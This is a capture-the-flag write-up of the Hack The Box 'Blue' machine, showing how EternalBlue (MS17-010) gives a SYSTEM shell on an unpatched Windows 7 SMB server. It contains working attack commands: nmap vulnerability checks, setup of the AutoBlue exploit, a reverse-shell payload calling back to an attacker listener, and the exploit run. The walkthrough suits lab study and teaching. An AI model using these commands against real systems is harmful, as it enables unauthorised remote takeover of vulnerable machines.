Blue
An unpatched Windows 7 SMBv1 server is vulnerable to EternalBlue (MS17-010); a single unauthenticated kernel-pool overflow returns a SYSTEM shell, making both flags trivially reachable — this post covers recon through the user flag.
Overview
Blue, while possibly the most simple machine on Hack The Box, demonstrates the severity of the EternalBlue exploit, which has been used in multiple large-scale ransomware and crypto-mining attacks since it was leaked publicly.
Machine Matrix
CVE-dominated: a single MS17-010/EternalBlue (CVE-2017-0144) unauthenticated kernel RCE is the entire box, with trivial enumeration and a point-and-click public PoC.
Recon
| Port | Service | Notes |
|---|---|---|
| 135/tcp | msrpc | Windows RPC endpoint mapper |
| 139/tcp | netbios-ssn | SMB over NetBIOS |
| 445/tcp | microsoft-ds | SMBv1 — the target |
| 49152-49157/tcp | msrpc | Dynamic RPC ports |
1
nmap -sVC -p- --open 10.129.11.192
The scan paints a classic legacy-Windows profile: the RPC endpoint mapper on 135, NetBIOS/SMB on 139 and 445, and a spread of high dynamic RPC ports. SMB is the entry point.
Enumeration
An OS-discovery scan fingerprints the host, and the MS17-010 NSE script confirms the box is unpatched:
1
nmap -p445 --script smb-os-discovery 10.129.11.192
1
nmap -p139,445 --script smb-vuln-ms17-010 10.129.11.192
The OS comes back as Windows 7 Professional 7601 Service Pack 1, and smb-vuln-ms17-010 reports VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010). That is the whole assessment — an unauthenticated kernel RCE is sitting on port 445.
Foothold
EternalBlue (CVE-2017-0144) is an out-of-bounds write in the SMBv1 Trans2 transaction handler. A crafted request that miscounts its extended-attribute buffer overflows a non-paged kernel pool allocation; grooming the pool and overflowing into an adjacent SMB structure yields a controlled write, which is used to plant and execute shellcode in kernel context. Because the malformed transaction is processed before authentication, no credentials are needed.
Using a non-Metasploit PoC (3ndG4me’s AutoBlue), generate a staged reverse-shell payload and fire it at the x64 target:
1
2
3
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
pip install -r AutoBlue-MS17-010/requirements.txt
bash AutoBlue-MS17-010/shellcode/shell_prep.sh # reverse shell, LHOST=10.10.16.13, LPORT=4444
Start a listener, then launch the Windows 7 x64 exploit:
1
2
nc -lvnp 4444
python2 AutoBlue-MS17-010/eternalblue_exploit7.py 10.129.11.192 AutoBlue-MS17-010/shellcode/sc_x64.bin
It may take a couple of attempts, but the overflow eventually succeeds and the listener catches a shell. Because the payload runs in the kernel, the shell is already SYSTEM:
C:\Windows\system32> whoami
nt authority\system
Flags
With a SYSTEM shell there is no privilege escalation to do — both flags are readable in one go, since type accepts multiple paths:
type C:\Users\haris\Desktop\user.txt C:\Users\Administrator\Desktop\root.txt